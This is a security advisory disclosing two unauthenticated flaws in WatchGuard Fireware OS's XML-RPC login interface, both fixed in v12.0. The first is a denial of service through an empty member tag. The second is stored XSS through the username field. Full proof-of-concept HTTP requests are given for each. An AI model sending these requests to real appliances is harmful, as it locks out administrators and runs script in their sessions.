Watchguard Firebox / XTM XML-RPC Empty Member Denial Of Service

`Watchguardas Firebox and XTM are a series of enterprise grade network  
security appliances providing advanced security services like next  
generation firewall, intrusion prevention, malware detection and  
blockage and others. Two vulnerabilities were discovered affecting the  
XML-RPC interface of the Web UI used to manage Fireware OS, the  
operating system running on Watchguard Firebox and XTM appliances. To  
exploit any of the flaws discovered, no authentication on the Web UI  
is required.  
---------------------------------------------------------------------------  
XML-RPC Empty Member DoS  
  
Versions Affected  
Fireware OS versions below v12.0 were found to be vulnerable.  
  
CVE Reference  
Vendor assigned internal id FBX-5312 to vulnerability and will release  
a knowledge Base article following this advisory.  
  
Vendor Fix  
Vendor fixed the vulnerability in their v12 release.  
  
Credit  
David Fernandez of Sidertia Solutions  
  
Description  
If a login attempt is made in the XML-RPC interface with a XML message  
containing and empty member tag, the wgagent crashes logging out any  
user with a session opened in the UI. By continuously executing the  
failed logging attempts, the device will be impossible to be managed  
using the UI. It was not tested if this flaw causes similar lockout  
and degradation in connectivity like my previous CVE-2017-8056.  
  
Proof of concept  
Below is an example of the request that causes a crash in the XML-RPC wgagent:  
  
POST /agent/login HTTP/1.1  
Host: fireware-host:4100  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Encoding: gzip, deflate, sdch, br  
Accept-Language: es,en;q=0.8,ca;q=0.6  
Cookie: sessionid=dasdasdas  
Content-Length: 207  
Content-Type: application/xml  
  
<methodCall><methodName>login</methodName><params><param><value><struct><member></member><member><name>user</name><value><string>admin</string></value></member></struct></value></param></params></methodCall>  
  
Links  
https://www.sidertia.com/Home/Community/Blog/2017/09/18/Fixed-Fireware-XXE-DOS-and-stored-XSS-vulnerabilities-discovered-by-Sidertia  
  
---------------------------------------------------------------------  
  
XML-RPC Username Stored Cross Site Scripting  
  
Versions Affected  
Fireware OS versions below v12.0 were found to be vulnerable.  
  
CVE Reference  
Vendor assigned internal id FBX-5313 to vulnerability and will release  
a knowledge Base article following this advisory.  
  
Vendor Fix  
Vendor fixed the vulnerability in their v12 release.  
  
Credit  
David Fernandez of Sidertia Solutions  
  
Description  
When a failed login attempt is made to the login endpoint of the  
XML-RPC interface, if javascript code, properly encoded to be consumed  
by XML parsers, is embedded as value of the user tag, the code will be  
rendered in the context of any logged in user in the Web UI visiting  
aTraffic Monitora sections aEventsa and aAlla. As a side effect, no  
further events will be visible in the Traffic Monitor until the device  
is restarted.  
  
Proof of concept  
POST /agent/login HTTP/1.1  
Host: fireware-host:4100  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Encoding: gzip, deflate, sdch, br  
Accept-Language: es,en;q=0.8,ca;q=0.6  
Cookie: sessionid=dasdasdas  
Content-Length: 298  
Content-Type: application/xml  
  
<methodCall><methodName>login</methodName><params><param><value><struct><member></member><member><name>user</name><value><string>aa<img  
onerror=alert('xss')  
src=>a</string></value></member></struct></value></param></params></methodCall>  
  
Links  
https://www.sidertia.com/Home/Community/Blog/2017/09/18/Fixed-Fireware-XXE-DOS-and-stored-XSS-vulnerabilities-discovered-by-Sidertia  
`